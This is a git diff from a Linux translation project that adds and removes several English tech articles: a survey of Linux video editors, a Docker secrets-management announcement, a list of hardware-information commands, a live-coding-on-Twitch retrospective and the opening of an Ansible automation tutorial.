sudo apt-get update
|
||||
sudo apt-get install vidcutter
|
||||
```
|
||||
|
||||
It is available in AUR so Arch Linux users can also install it easily. For other Linux distributions, you can find the installation files on its [GitHub page][45].
|
||||
|
||||
### Which is the best video editing software for Linux?
|
||||
|
||||
A number of video editors mentioned here use [FFmpeg][46]. You can use FFmpeg on your own as well. It's a command line only tool so I didn't include it in the main list but it would have been unfair to not mention it at all.
|
||||
|
||||
If you need an editor for simply cutting and joining videos, go with VidCutter.
|
||||
|
||||
If you need something more than that, **OpenShot** or **Kdenlive** is a good choice. These are suitable for beginners and a system with standard specification.
|
||||
|
||||
If you have a high-end computer and need advanced features you can go out with **Lightworks** or **DaVinci Resolve**. If you are looking for more advanced features for 3D works, **Blender** has got your back.
|
||||
|
||||
So that's all I can write about the ** best video editing software for Linux** such as Ubuntu, Linux Mint, Elementary, and other Linux distributions. Share with us which video editor you like the most.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://itsfoss.com/best-video-editing-software-linux/
|
||||
|
||||
作者:[It'S Foss Team][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://itsfoss.com/author/itsfoss/
|
||||
[1]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=
|
||||
[2]:https://itsfoss.com/wp-content/uploads/2016/06/best-Video-editors-Linux-800x450.png
|
||||
[3]:https://itsfoss.com/linux-photo-management-software/
|
||||
[4]:https://itsfoss.com/best-modern-open-source-code-editors-for-linux/
|
||||
[5]:https://itsfoss.com/wp-content/uploads/2016/06/kdenlive-free-video-editor-on-ubuntu.jpg
|
||||
[6]:https://kdenlive.org/
|
||||
[7]:https://itsfoss.com/tag/open-source/
|
||||
[8]:https://www.kde.org/
|
||||
[9]:https://kdenlive.org/download/
|
||||
[10]:https://itsfoss.com/wp-content/uploads/2016/06/openshot-free-video-editor-on-ubuntu.jpg
|
||||
[11]:http://www.openshot.org/
|
||||
[12]:http://www.openshot.org/user-guide/
|
||||
[13]:http://www.openshot.org/download/
|
||||
[14]:https://itsfoss.com/wp-content/uploads/2016/06/shotcut-video-editor-linux-800x503.jpg
|
||||
[15]:https://www.shotcut.org/
|
||||
[16]:https://www.shotcut.org/tutorials/
|
||||
[17]:https://www.shotcut.org/features/
|
||||
[18]:https://itsfoss.com/use-snap-packages-ubuntu-16-04/
|
||||
[19]:https://www.shotcut.org/download/
|
||||
[20]:https://itsfoss.com/wp-content/uploads/2016/06/flowblade-movie-editor-on-ubuntu.jpg
|
||||
[21]:http://jliljebl.github.io/flowblade/
|
||||
[22]:https://jliljebl.github.io/flowblade/webhelp/help.html
|
||||
[23]:https://jliljebl.github.io/flowblade/webhelp/proxy.html
|
||||
[24]:https://jliljebl.github.io/flowblade/features.html
|
||||
[25]:https://jliljebl.github.io/flowblade/download.html
|
||||
[26]:https://itsfoss.com/wp-content/uploads/2016/06/lightworks-running-on-ubuntu-16.04.jpg
|
||||
[27]:https://www.lwks.com/
|
||||
[28]:https://en.wikipedia.org/wiki/Non-linear_editing_system
|
||||
[29]:https://www.lwks.com/index.php?option=com_lwks&view=download&Itemid=206&tab=4
|
||||
[30]:https://www.lwks.com/videotutorials
|
||||
[31]:https://www.lwks.com/index.php?option=com_lwks&view=download&Itemid=206&tab=1
|
||||
[32]:https://itsfoss.com/wp-content/uploads/2016/06/blender-running-on-ubuntu-16.04.jpg
|
||||
[33]:https://www.blender.org/
|
||||
[34]:https://www.blender.org/features/
|
||||
[35]:https://www.blender.org/download/
|
||||
[36]:https://itsfoss.com/wp-content/uploads/2016/06/cinelerra-screenshot.jpeg
|
||||
[37]:http://cinelerra.org/
|
||||
[38]:http://cinelerra.org/our-story
|
||||
[39]:https://sourceforge.net/projects/heroines/files/cinelerra-6-src.tar.xz/download
|
||||
[40]:http://cinelerra.org/download
|
||||
[41]:https://itsfoss.com/wp-content/uploads/2016/06/davinci-resolve-vdeo-editor-800x450.jpg
|
||||
[42]:https://www.blackmagicdesign.com/products/davinciresolve/
|
||||
[43]:https://itsfoss.com/wp-content/uploads/2016/06/vidcutter-screenshot-800x585.jpeg
|
||||
[44]:https://itsfoss.com/vidcutter-video-editor-linux/
|
||||
[45]:https://github.com/ozmartian/vidcutter/releases
|
||||
[46]:https://www.ffmpeg.org/
|
@ -1,113 +0,0 @@
|
||||
|
||||
translating by HardworkFish
|
||||
|
||||
INTRODUCING DOCKER SECRETS MANAGEMENT
|
||||
============================================================
|
||||
|
||||
Containers are changing how we view apps and infrastructure. Whether the code inside containers is big or small, container architecture introduces a change to how that code behaves with hardware – it fundamentally abstracts it from the infrastructure. Docker believes that there are three key components to container security and together they result in inherently safer apps.
|
||||
|
||||
![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1)
|
||||
|
||||
A critical element of building safer apps is having a secure way of communicating with other apps and systems, something that often requires credentials, tokens, passwords and other types of confidential information—usually referred to as application secrets. We are excited to introduce Docker Secrets, a container native solution that strengthens the Trusted Delivery component of container security by integrating secret distribution directly into the container platform.
|
||||
|
||||
With containers, applications are now dynamic and portable across multiple environments. This made existing secrets distribution solutions inadequate because they were largely designed for static environments. Unfortunately, this led to an increase in mismanagement of application secrets, making it common to find insecure, home-grown solutions, such as embedding secrets into version control systems like GitHub, or other equally bad—bolted on point solutions as an afterthought.
|
||||
|
||||
### Introducing Docker Secrets Management
|
||||
|
||||
We fundamentally believe that apps are safer if there is a standardized interface for accessing secrets. Any good solution will also have to follow security best practices, such as encrypting secrets while in transit; encrypting secrets at rest; preventing secrets from unintentionally leaking when consumed by the final application; and strictly adhere to the principle of least-privilege, where an application only has access to the secrets that it needs—no more, no less.
|
||||
|
||||
By integrating secrets into Docker orchestration, we are able to deliver a solution for the secrets management problem that follows these exact principles.
|
||||
|
||||
The following diagram provides a high-level view of how the Docker swarm mode architecture is applied to securely deliver a new type of object to our containers: a secret object.
|
||||
|
||||
![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1)
|
||||
|
||||
In Docker, a secret is any blob of data, such as a password, SSH private key, TLS Certificate, or any other piece of data that is sensitive in nature. When you add a secret to the swarm (by running `docker secret create`), Docker sends the secret over to the swarm manager over a mutually authenticated TLS connection, making use of the [built-in Certificate Authority][17] that gets automatically created when bootstrapping a new swarm.
|
||||
|
||||
```
|
||||
$ echo "This is a secret" | docker secret create my_secret_data -
|
||||
```
|
||||
|
||||
Once the secret reaches a manager node, it gets saved to the internal Raft store, which uses NACL’s Salsa20Poly1305 with a 256-bit key to ensure no data is ever written to disk unencrypted. Writing to the internal store gives secrets the same high availability guarantees that the the rest of the swarm management data gets.
|
||||
|
||||
When a swarm manager starts up, the encrypted Raft logs containing the secrets is decrypted using a data encryption key that is unique per-node. This key, and the node’s TLS credentials used to communicate with the rest of the cluster, can be encrypted with a cluster-wide key encryption key, called the unlock key, which is also propagated using Raft and will be required on manager start.
|
||||
|
||||
When you grant a newly-created or running service access to a secret, one of the manager nodes (only managers have access to all the stored secrets stored) will send it over the already established TLS connection exclusively to the nodes that will be running that specific service. This means that nodes cannot request the secrets themselves, and will only gain access to the secrets when provided to them by a manager – strictly for the services that require them.
|
||||
|
||||
```
|
||||
$ docker service create --name="redis" --secret="my_secret_data" redis:alpine
|
||||
```
|
||||
|
||||
The unencrypted secret is mounted into the container in an in-memory filesystem at /run/secrets/<secret_name>.
|
||||
|
||||
```
|
||||
$ docker exec $(docker ps --filter name=redis -q) ls -l /run/secrets
|
||||
total 4
|
||||
-r--r--r-- 1 root root 17 Dec 13 22:48 my_secret_data
|
||||
```
|
||||
|
||||
If a service gets deleted, or rescheduled somewhere else, the manager will immediately notify all the nodes that no longer require access to that secret to erase it from memory, and the node will no longer have any access to that application secret.
|
||||
|
||||
```
|
||||
$ docker service update --secret-rm="my_secret_data" redis
|
||||
|
||||
$ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret_data
|
||||
|
||||
cat: can't open '/run/secrets/my_secret_data': No such file or directory
|
||||
```
|
||||
|
||||
Check out the [Docker secrets docs][18] for more information and examples on how to create and manage your secrets. And a special shout out to Laurens Van Houtven (https://www.lvh.io/[)][19] in collaboration with the Docker security and core engineering team to help make this feature a reality.
|
||||
|
||||
[Get safer apps for dev and ops w/ new #Docker secrets management][5]
|
||||
|
||||
[CLICK TO TWEET][6]
|
||||
|
||||
###
|
||||
![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/Screenshot-2017-02-08-23.30.13.png?resize=1032%2C111&ssl=1)
|
||||
|
||||
### Safer Apps with Docker
|
||||
|
||||
Docker secrets is designed to be easily usable by developers and IT ops teams to build and run safer apps. Docker secrets is a container first architecture designed to keep secrets safe and used only when needed by the exact container that needs that secret to operate. From defining apps and secrets with Docker Compose through an IT admin deploying that Compose file directly in Docker Datacenter, the services, secrets, networks and volumes will travel securely, safely with the application.
|
||||
|
||||
Resources to learn more:
|
||||
|
||||
* [Docker Datacenter on 1.13 with Secrets, Security Scanning, Content Cache and More][7]
|
||||
|
||||
* [Download Docker][8] and get started today
|
||||
|
||||
* [Try secrets in Docker Datacenter][9]
|
||||
|
||||
* [Read the Documentation][10]
|
||||
|
||||
* Attend an [upcoming webinar][11]
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://blog.docker.com/2017/02/docker-secrets-management/
|
||||
|
||||
作者:[ Ying Li][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://blog.docker.com/author/yingli/
|
||||
[1]:http://www.linkedin.com/shareArticle?mini=true&url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management&summary=Containers%20are%20changing%20how%20we%20view%20apps%20and%20infrastructure.%20Whether%20the%20code%20inside%20containers%20is%20big%20or%20small,%20container%20architecture%20introduces%20a%20change%20to%20how%20that%20code%20behaves%20with%20hardware%20-%20it%20fundamentally%20abstracts%20it%20from%20the%20infrastructure.%20Docker%20believes%20that%20there%20are%20three%20key%20components%20to%20container%20security%20and%20...
|
||||
[2]:http://www.reddit.com/submit?url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management
|
||||
[3]:https://plus.google.com/share?url=http://dockr.ly/2k6gnOB
|
||||
[4]:http://news.ycombinator.com/submitlink?u=http://dockr.ly/2k6gnOB&t=Introducing%20Docker%20Secrets%20Management
|
||||
[5]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB
|
||||
[6]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB
|
||||
[7]:http://dockr.ly/AppSecurity
|
||||
[8]:https://www.docker.com/getdocker
|
||||
[9]:http://www.docker.com/trial
|
||||
[10]:https://docs.docker.com/engine/swarm/secrets/
|
||||
[11]:http://www.docker.com/webinars
|
||||
[12]:https://blog.docker.com/author/yingli/
|
||||
[13]:https://blog.docker.com/tag/container-security/
|
||||
[14]:https://blog.docker.com/tag/docker-security/
|
||||
[15]:https://blog.docker.com/tag/secrets-management/
|
||||
[16]:https://blog.docker.com/tag/security/
|
||||
[17]:https://docs.docker.com/engine/swarm/how-swarm-mode-works/pki/
|
||||
[18]:https://docs.docker.com/engine/swarm/secrets/
|
||||
[19]:https://lvh.io%29/
|
@ -0,0 +1,98 @@
|
||||
translating---geekpi
|
||||
|
||||
Commands to check System & Hardware Information
|
||||
======
|
||||
Hello linux-fanatics, in this post i will be discussing some important that will make your life as System Administrator. As we all know being a good System Administrator means knowing everything about your IT Infrastructure & having all the information about your servers, whether its hardware or OS. So following commands will help you out in extracting out all the hardware & system information.
|
||||
|
||||
#### 1- Viewing system information
|
||||
|
||||
$ uname -a
|
||||
|
||||
![uname command][2]
|
||||
|
||||
It will provide you all the information about your system. It will provide you with Kernel name of system, Hostname, Kernel version, Kernel Release, Hardware name.
|
||||
|
||||
#### 2- Viewing Hardware information
|
||||
|
||||
$ lshw
|
||||
|
||||
![lshw command][4]
|
||||
|
||||
Using lshw will show you all the Hardware information on your screen.
|
||||
|
||||
#### 3- Viewing Block Devices(Hard disks, Flash drives) information
|
||||
|
||||
$ lsblk
|
||||
|
||||
![lsblk command][6]
|
||||
|
||||
lsblk command prints all the information regarding block devices on screen. Use lsblk -a to show all the block devices.
|
||||
|
||||
#### 4- Viewing CPU information
|
||||
|
||||
$ lscpu
|
||||
|
||||
![lscpu command][8]
|
||||
|
||||
lscpu shows all the CPU information on screen.
|
||||
|
||||
#### 5- Viewing PCI information
|
||||
|
||||
$ lspci
|
||||
|
||||
![lspci command][10]
|
||||
|
||||
All the network adapter cards, USB cards, Graphics cards are termed as PCIs. To view their information use lspci .
|
||||
|
||||
lspci -v will give detailed information regarding PCI cards.
|
||||
|
||||
lspci -t will show them in tree format.
|
||||
|
||||
#### 6- Viewing USB information
|
||||
|
||||
$ lsusb
|
||||
|
||||
![lsusb command][12]
|
||||
|
||||
To view information regarding all USB controllers & devices connected to them, we use lsusb
|
||||
|
||||
#### 7- Viewing SCSI information
|
||||
|
||||
$ lssci
|
||||
|
||||
![lssci][14]
|
||||
|
||||
To view SCSI information type lsscsi. lsscsi -s will also show the size of partition.
|
||||
|
||||
#### 8- Viewing file system information
|
||||
|
||||
$ fdisk -l
|
||||
|
||||
![fdisk command][16]
|
||||
|
||||
Using fdisk -l will show information regarding the file system. Although main function of fdisk utility is to modify a file system, you can create new partitions, delete old ones ( more on that in my future tutorial).
|
||||
|
||||
That's it for now my fellow Linux-fanatics . You are advised to check out my other posts regarding Linux commands **[HERE][17] & ** another one **[HERE][18]
|
||||
**
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://linuxtechlab.com/commands-system-hardware-info/
|
||||
|
||||
作者:[Shusain][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://linuxtechlab.com/author/shsuain/
|
||||
[2]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/uname.jpg?resize=664%2C69
|
||||
[4]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lshw.jpg?resize=641%2C386
|
||||
[6]:https://i1.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lsblk.jpg?resize=646%2C162
|
||||
[8]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lscpu.jpg?resize=643%2C216
|
||||
[10]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lspci.jpg?resize=644%2C238
|
||||
[12]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lsusb.jpg?resize=645%2C37
|
||||
[14]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lsscsi.jpg?resize=639%2C110
|
||||
[16]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/fdisk.jpg?resize=656%2C335
|
||||
[17]:http://linuxtechlab.com/linux-commands-beginners-part-1/
|
||||
[18]:http://linuxtechlab.com/linux-commands-beginners-part-2/
|
@ -1,165 +0,0 @@
|
||||
Translating by lonaparte
|
||||
|
||||
Lessons from my first year of live coding on Twitch
|
||||
============================================================
|
||||
|
||||
I gave streaming a go for the first time last July. Instead of gaming, which the majority of streamers on Twitch do, I wanted to stream the open source work I do in my personal time. I work on NodeJS hardware libraries a fair bit (most of them my own). Given that I was already in a niche on Twitch, why not be in an even smaller niche, like JavaScript powered hardware ;) I signed up for [my own channel][1], and have been streaming regularly since.
|
||||
|
||||
Of course I’m not the first to do this. [Handmade Hero][2] was one of the first programmers I watched code online, quickly followed by the developers at Vlambeer who [developed Nuclear Throne live on Twitch][3]. I was fascinated by Vlambeer especially.
|
||||
|
||||
What tipped me over the edge of _wishing_ I could do it to _actually doing it_ is credited to [Nolan Lawson][4], a friend of mine. I watched him [streaming his open source work one weekend][5], and it was awesome. He explained everything he was doing along the way. Everything. Replying to issues on GitHub, triaging bugs, debugging code in branches, you name it. I found it fascinating, as Nolan maintains open source libraries that get a lot of use and activity. His open source life is very different to mine.
|
||||
|
||||
You can even see this comment I left under his video:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*tm8xC8CJV9ZimCCI.png)
|
||||
|
||||
I gave it a go myself a week or so later, after setting up my Twitch channel and bumbling my way through using OBS. I believe I worked on [Avrgirl-Arduino][6], which I still frequently work on while streaming. It was a rough first stream. I was very nervous, and I had stayed up late rehearsing everything I was going to do the night before.
|
||||
|
||||
The tiny number of viewers I got that Saturday were really encouraging though, so I kept at it. These days I have more than a thousand followers, and a lovely subset of them are regular visitors who I call “the noopkat fam”.
|
||||
|
||||
We have a lot of fun, and I like to call the live coding parts “massively multiplayer online pair programming”. I am truly touched by the kindness and wit of everyone joining me each weekend. One of the funniest moments I have had was when one of the fam pointed out that my Arduino board was not working with my software because the microchip was missing from the board:
|
||||
|
||||
|
||||
I have logged off a stream many a time, only to find in my inbox that someone has sent a pull request for some work that I had mentioned I didn’t have the time to start on. I can honestly say that my open source work has been changed for the better, thanks to the generosity and encouragement of my Twitch community.
|
||||
|
||||
I have so much more to say about the benefits that streaming on Twitch has brought me, but that’s for another blog post probably. Instead, I want to share the lessons I have learned for anyone else who would like to try live coding in this way for themselves. Recently I’ve been asked by a few developers how they can get started, so I’m publishing the same advice I have given them!
|
||||
|
||||
Firstly, I’m linking you to a guide called [“Streaming and Finding Success on Twitch”][7] which helped me a lot. It’s focused towards Twitch and gaming streams specifically, but there are still relevant sections and great advice in there. I’d recommend reading this first before considering any other details about starting your channel (like equipment or software choices).
|
||||
|
||||
My own advice is below, which I have acquired from my own mistakes and the sage wisdom of fellow streamers (you know who you are!).
|
||||
|
||||
### Software
|
||||
|
||||
There’s a lot of free streaming software out there to stream with. I use [Open Broadcaster Software (OBS)][8]. It’s available on most platforms. I found it really intuitive to get up and going, but others sometimes take a while to learn how it works. Your mileage may vary! Here is a screen-grab of what my OBS ‘desktop scene’ setup looks like as of today (click for larger image):
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*s4wyeYuaiThV52q5.png)
|
||||
|
||||
You essentially switch between ‘scenes’ while streaming. A scene is a collection of ‘sources’, layered and composited with each other. A source can be things like a camera, microphone, your desktop, a webpage, live text, images, the list goes on. OBS is very powerful.
|
||||
|
||||
This desktop scene above is where I do all of my live coding, and I mostly live here for the duration of the stream. I use iTerm and vim, and also have a browser window handy to switch to in order to look up documentation and triage things on GitHub, etc.
|
||||
|
||||
The bottom black rectangle is my webcam, so folks can see me work and have a more personal connection.
|
||||
|
||||
I have a handful of ‘labels’ for my scenes, many of which are to do with the stats and info in the top banner. The banner just adds personality, and is a nice persistent source of info while streaming. It’s an image I made in [GIMP][9], and you import it as a source in your scene. Some labels are live stats that pull from text files (such as most recent follower). Another label is a [custom one I made][10] which shows the live temperature and humidity of the room I stream from.
|
||||
|
||||
I have also ‘alerts’ set up in my scenes, which show cute banners over the top of my stream whenever someone follows or donates money. I use the web service [Stream Labs][11] to do this, importing it as a browser webpage source into the scene. Stream Labs also creates my recent followers live text file to show in my banner.
|
||||
|
||||
I also have a standby screen that I use when I’m about to be live:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*cbkVjKpyWaWZLSfS.png)
|
||||
|
||||
I additionally need a scene for when I’m entering secret tokens or API keys. It shows me on the webcam but hides my desktop with an entertaining webpage, so I can work in privacy:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*gbhowQ37jr3ouKhL.png)
|
||||
|
||||
As you can see, I don’t take stuff too seriously when streaming, but I like to have a good setup for my viewers to get the most out of my stream.
|
||||
|
||||
But now for an actual secret: I use OBS to crop out the bottom and right edges of my screen, while keeping the same video size ratio as what Twitch expects. That leaves me with space to watch my events (follows, etc) on the bottom, and look at and respond to my channel chat box on the right. Twitch allows you to ‘pop out’ the chatbox in a new window which is really helpful.
|
||||
|
||||
This is what my full desktop _really _ looks like:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*sENLkp3Plh7ZTjJt.png)
|
||||
|
||||
I started doing this a few months ago and haven’t looked back. I’m not even sure my viewers realise this is how my setup works. I think they take for granted that I can see everything, even though I cannot see what is actually being streamed live when I’m busy programming!
|
||||
|
||||
You might be wondering why I only use one monitor. It’s because two monitors was just too much to manage on top of everything else I was doing while streaming. I figured this out quickly and have stuck with one screen since.
|
||||
|
||||
### Hardware
|
||||
|
||||
I used cheaper stuff to start out, and slowly bought nicer stuff as I realised that streaming was going to be something I stuck with. Use whatever you have when getting started, even if it’s your laptop’s built in microphone and camera.
|
||||
|
||||
Nowadays I use a Logitech Pro C920 webcam, and a Blue Yeti microphone on a microphone arm with a mic shock. Totally worth the money in the end if you have it to spend. It made a difference to the quality of my streams.
|
||||
|
||||
I use a large monitor (27"), because as I mentioned earlier using two monitors just didn’t work for me. I was missing things in the chat because I was not looking over to the second laptop screen enough, etc etc. Your milage may vary here, but having everything on one screen was key for me to pay attention to everything happening.
|
||||
|
||||
That’s pretty much it on the hardware side; I don’t have a very complicated setup.
|
||||
|
||||
If you were interested, my desk looks pretty normal except for the obnoxious looming microphone:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*EyRimlrHNEKeFmS4.jpg)
|
||||
|
||||
### Tips
|
||||
|
||||
This last section has some general tips I’ve picked up, that have made my stream better and more enjoyable overall.
|
||||
|
||||
#### Panels
|
||||
|
||||
Spend some time on creating great panels. Panels are the little content boxes on the bottom of everyone’s channel page. I see them as the new MySpace profile boxes (lol but really). Panel ideas could be things like chat rules, information about when you stream, what computer and equipment you use, your favourite cat breed; anything that creates a personal touch. Look at other channels (especially popular ones) for ideas!
|
||||
|
||||
An example of one of my panels:
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/0*HlLs6xlnJtPwN4D6.png)
|
||||
|
||||
#### Chat
|
||||
|
||||
Chat is really important. You’re going to get the same questions over and over as people join your stream halfway through, so having chat ‘macros’ can really help. “What are you working on?” is the most common question asked while I’m coding. I have chat shortcut ‘commands’ for that, which I made with [Nightbot][12]. It will put an explanation of something I have entered in ahead of time, by typing a small one word command like _!whatamidoing_
|
||||
|
||||
When folks ask questions or leave nice comments, talk back to them! Say thanks, say their Twitch handle, and they’ll really appreciate the attention and acknowledgement. This is SUPER hard to stay on top of when you first start streaming, but multitasking will come easier as you do more. Try to take a few seconds every couple of minutes to look at the chat for new messages.
|
||||
|
||||
When programming, _explain what you’re doing_ . Talk a lot. Make jokes. Even when I’m stuck, I’ll say, “oh, crap, I forget how to use this method lemme Google it hahaha” and folks are always nice and sometimes they’ll even read along with you and help you out. It’s fun and engaging, and keeps folks watching.
|
||||
|
||||
I lose interest quickly when I’m watching programming streams where the streamer is sitting in silence typing code, ignoring the chat and their new follower alerts.
|
||||
|
||||
It’s highly likely that 99% of folks who find their way to your channel will be friendly and curious. I get the occasional troll, but the moderation tools offered by Twitch and Nightbot really help to discourage this.
|
||||
|
||||
#### Prep time
|
||||
|
||||
Automate your setup as much as possible. My terminal is iTerm, and it lets you save window arrangements and font sizes so you can restore back to them later. I have one window arrangement for streaming and one for non streaming. It’s a massive time saver. I hit one command and everything is the perfect size and in the right position, ready to go.
|
||||
|
||||
There are other apps out there that automate all of your app window placements, have a look to see if any of them would also help.
|
||||
|
||||
Make your font size really large in your terminal and code editor so everyone can see.
|
||||
|
||||
#### Regularity
|
||||
|
||||
Be regular with your schedule. I only stream once a week, but always at the same time. Let folks know if you’re not able to stream during an expected time you normally do. This has netted me a regular audience. Some folks love routine and it’s exactly like catching up with a friend. You’re in a social circle with your community, so treat it that way.
|
||||
|
||||
I want to stream more often, but I know I can’t commit to more than once a week because of travel. I am trying to come up with a way to stream in high quality when on the road, or perhaps just have casual chats and save programming for my regular Sunday stream. I’m still trying to figure this out!
|
||||
|
||||
#### Awkwardness
|
||||
|
||||
It’s going to feel weird when you get started. You’re going to feel nervous about folks watching you code. That’s normal! I felt that really strongly at the beginning, even though I have public speaking experience. I felt like there was nowhere for me to hide, and it scared me. I thought, “everyone is going to think my code is bad, and that I’m a bad developer”. This is a thought pattern that has plagued me my _entire career_ though, it’s nothing new. I knew that with this, I couldn’t quietly refactor code before pushing to GitHub, which is generally much safer for my reputation as a developer.
|
||||
|
||||
I learned a lot about my programming style by live coding on Twitch. I learned that I’m definitely the “make it work, then make it readable, then make it fast” type. I don’t rehearse the night before anymore (I gave that up after 3 or 4 streams right at the beginning), so I write pretty rough code on Twitch and have to be okay with that. I write my best code when alone with my thoughts and not watching a chat box + talking aloud, and that’s okay. I forget method signatures that I’ve used a thousand times, and make ‘silly’ mistakes in almost every single stream. For most, it’s not a productive environment for being at your best.
|
||||
|
||||
My Twitch community never judges me for this, and they help me out a lot. They understand I’m multitasking, and are really great about pragmatic advice and suggestions. Sometimes they bail me out, and other times I have to explain to them why their suggestion won’t work. It’s really just like regular pair programming!
|
||||
|
||||
I think the ‘warts and all’ approach to this medium is a strength, not a weakness. It makes you more relatable, and it’s important to show that there’s no such thing as the perfect programmer, or the perfect code. It’s probably quite refreshing for new coders to see, and humbling for myself as a more experienced coder.
|
||||
|
||||
### Conclusion
|
||||
|
||||
If you’ve been wanting to get into live coding on Twitch, I encourage you to give it a try! I hope this post helped you if you have been wondering where to start.
|
||||
|
||||
If you’d like to join me on Sundays, you can [follow my channel on Twitch][13] :)
|
||||
|
||||
On my last note, I’d like to personally thank [Mattias Johansson][14] for his wisdom and encouragement early on in my streaming journey. He was incredibly generous, and his [FunFunFunction YouTube channel][15] is a continuous source of inspiration.
|
||||
|
||||
Update: a bunch of folks have been asking about my keyboard and other parts of my workstation. [Here is the complete list of what I use][16]. Thanks for the interest!
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://medium.freecodecamp.org/lessons-from-my-first-year-of-live-coding-on-twitch-41a32e2f41c1
|
||||
|
||||
作者:[ Suz Hinton][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://medium.freecodecamp.org/@suzhinton
|
||||
[1]:https://www.twitch.tv/noopkat
|
||||
[2]:https://www.twitch.tv/handmade_hero
|
||||
[3]:http://nuclearthrone.com/twitch/
|
||||
[4]:https://twitter.com/nolanlawson
|
||||
[5]:https://www.youtube.com/watch?v=9FBvpKllTQQ
|
||||
[6]:https://github.com/noopkat/avrgirl-arduino
|
||||
[7]:https://www.reddit.com/r/Twitch/comments/4eyva6/a_guide_to_streaming_and_finding_success_on_twitch/
|
||||
[8]:https://obsproject.com/
|
||||
[9]:https://www.gimp.org/
|
||||
[10]:https://github.com/noopkat/study-temp
|
||||
[11]:https://streamlabs.com/
|
||||
[12]:https://beta.nightbot.tv/
|
||||
[13]:https://www.twitch.tv/noopkat
|
||||
[14]:https://twitter.com/mpjme
|
||||
[15]:https://www.youtube.com/channel/UCO1cgjhGzsSYb1rsB4bFe4Q
|
||||
[16]:https://gist.github.com/noopkat/5de56cb2c5917175c5af3831a274a2c8
|
@ -0,0 +1,298 @@
|
||||
translating by lujun9972
|
||||
How to automate your system administration tasks with Ansible
|
||||
======
|
||||
![配图][https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_google_wave.png?itok=2oh8TpUi]
|
||||
Do you want to sharpen your system administration or Linux skills? Perhaps you have some stuff running on your local LAN and you want to make your life easier--where do you begin? In this article, I'll explain how to set up tooling to simplify administering multiple machines.
|
||||
|
||||
When it comes to remote administration tools, SaltStack, Puppet, Chef, and [Ansible][1] are a few popular options. Throughout this article, I'll focus on Ansible and explain how it can be helpful whether you have 5 virtual machines or a 1,000.
|
||||
|
||||
Our journey begins with the basic administration of multiple machines, whether they are virtual or physical. I will assume you have an idea of what you want to achieve, and basic Linux administration skills (or at least the ability to look up the steps required to perform each task). I will show you how to use the tools, and it is up to you to decide what to do with them.
|
||||
|
||||
### What is Ansible?
|
||||
|
||||
The Ansible website explains the project as "a radically simple IT automation engine that automates cloud provisioning, configuration management, application deployment, intra-service orchestration, and many other IT needs." Ansible can be used to perform the same tasks across a defined set of servers from a centralized location.
|
||||
|
||||
If you are familiar with Bash for-loops, you'll find that Ansible operates in a similar fashion. The difference, however, is that Ansible is _idempotent_. In layman's terms this means that generally Ansible only performs the requested action if a change will occur as a result. For example, if you were to perform a Bash for-loop to create a user across all of your machines, it may look something like this:
|
||||
```
|
||||
for server in serverA serverB serverC; do ssh ${server} "useradd myuser"; done
|
||||
```
|
||||
|
||||
This would create **myuser** on **serverA** , **serverB** , and **serverC** ; however, it would run the **user add** command every single time the for-loop was run, whether or not the user existed. An idempotent system will first check whether the user exists, and if it does not, the tool will create it. This is a simplified example, of course, but the benefits of an idempotent tool will become more clear over time.
|
||||
|
||||
#### How does Ansible work?
|
||||
|
||||
